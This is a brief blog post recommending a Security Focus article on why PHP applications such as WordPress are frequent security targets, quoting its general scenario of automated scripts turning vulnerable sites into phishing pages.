Excellent post on Security Focus by Kelly Martin called PHP apps: Security’s Low-hanging Fruit which is a worthwhile read for anyone using applications written in PHP, just like WordPress for example. The article talks about the rise in popularity of PHP, the subsequent increase in PHP-based applications and the problems brought about by less-experienced coders contributing to Open Source projects. Apparently PHP applications accounted for about 43% of all security incidents in 2006 which is a pretty staggering statistic.
Here’s one of the scenarios he painted:
There are all sorts of automated scripts out there that search for vulnerable PHP applications, exploit them when found, and then automatically download a set of phishing HTML files and images that make John’s Awesome Blog suddenly look like the Bank of America’s login page. This also happens with ASP and Perl applications too, as well as those written in other languages, but today PHP is far more popular a target. That website owner, John, might be held responsible too if there weren’t dozens of these incidents each day.
Pretty scary huh? Well it’s worth paying head to the article so check it out!
